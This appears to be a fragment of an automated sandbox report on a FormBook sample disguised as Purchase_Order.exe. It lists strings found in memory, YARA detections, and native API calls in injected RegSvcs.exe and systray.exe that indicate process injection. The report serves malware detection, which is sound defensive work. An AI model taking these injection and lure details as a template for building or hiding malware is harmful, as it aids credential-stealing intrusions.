            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000007.00000000.291833894.000000000EBF8000.00000004.00000001.sdmpString found in binary or memory: http://schemas.mi
            Source: explorer.exe, 00000007.00000000.291833894.000000000EBF8000.00000004.00000001.sdmpString found in binary or memory: http://schemas.micr
            Source: Purchase_Order.exe, 00000000.00000002.259634056.0000000002AD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Purchase_Order.exe, 00000000.00000003.245364083.00000000061EE000.00000004.00000001.sdmpString found in binary or memory: http://www.agfamonotype.
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000007.00000000.282669456.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: Purchase_Order.exe, 00000000.00000003.242501601.00000000061CD000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: Purchase_Order.exe, 00000000.00000003.242455042.00000000061CD000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coma
            Source: Purchase_Order.exe, 00000000.00000003.242501601.00000000061CD000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comen
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Purchase_Order.exe, 00000000.00000003.242501601.00000000061CD000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.commd
            Source: Purchase_Order.exe, 00000000.00000002.269184385.00000000061CE000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Purchase_Order.exe, 00000000.00000003.245036335.00000000061EE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Purchase_Order.exe, 00000000.00000003.248726624.00000000061EE000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: Purchase_Order.exeString found in binary or memory: http://www.google.com
            Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmp, Purchase_Order.exe, 00000000.00000003.243172768.00000000061CA000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/=
            Source: Purchase_Order.exe, 00000000.00000003.243172768.00000000061CA000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/N
            Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Q
            Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/X
            Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/b
            Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/N
            Source: Purchase_Order.exe, 00000000.00000003.243525864.00000000061C8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Q
            Source: Purchase_Order.exe, 00000000.00000003.243047372.00000000061C3000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/oi
            Source: Purchase_Order.exe, 00000000.00000003.243319388.00000000061C8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/u
            Source: Purchase_Order.exe, 00000000.00000003.250232182.00000000061ED000.00000004.00000001.sdmp, Purchase_Order.exe, 00000000.00000003.245076408.00000000061EE000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Purchase_Order.exe, 00000000.00000003.243758051.00000000061F1000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com-u
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Purchase_Order.exe, 00000000.00000002.270075465.00000000073D2000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.289352994.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: Purchase_Order.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004181C0 NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00418270 NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004182F0 NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004183A0 NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041826A NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004182EE NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041839A NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B98F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B97A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9950 NtQueueApcThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B99D0 NtCreateProcessEx,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9820 NtEnumerateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012BB040 NtSuspendThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B98A0 NtWriteVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9B00 NtSetValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012BA3B0 NtGetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9A10 NtQuerySection,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9A80 NtOpenDirectoryObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9520 NtWaitForSingleObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012BAD30 NtSetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9560 NtWriteFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B95F0 NtQueryInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9730 NtQueryVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012BA710 NtOpenProcessToken,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9760 NtOpenProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9770 NtSetInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012BA770 NtOpenThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9610 NtEnumerateValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9670 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B9650 NtQueryValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B96D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FAAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FAA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FAA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FAB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FAA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_04FA9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010D81C0 NtCreateFile,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010D83A0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010D8270 NtReadFile,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010D82F0 NtClose,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010D839A NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010D826A NtReadFile,
            Source: C:\Windows\SysWOW64\systray.exeCode function: 16_2_010D82EE NtClose,
            Source: C:\Users\user\Desktop\Purchase_Order.exeCode function: 0_2_0291C2B0
            Source: C:\Users\user\Desktop\Purchase_Order.exeCode function: 0_2_029199A0
            Source: C:\Users\user\Desktop\Purchase_Order.exeCode function: 0_2_05E60040
            Source: C:\Users\user\Desktop\Purchase_Order.exeCode function: 0_2_05E667F9
            Source: C:\Users\user\Desktop\Purchase_Order.exeCode function: 0_2_05E66808
            Source: C:\Users\user\Desktop\Purchase_Order.exeCode function: 0_2_004F2050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00401030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041B8F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00401175
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00408C5C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00408C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C40A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00408C1A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402D8D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01294120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127F900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012999BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134E824
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01331002
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A20A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013420A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128B090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013428EC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01342B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129AB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AEBB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133DBD2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013303DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0132FA2B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013422AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01270D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01342D07
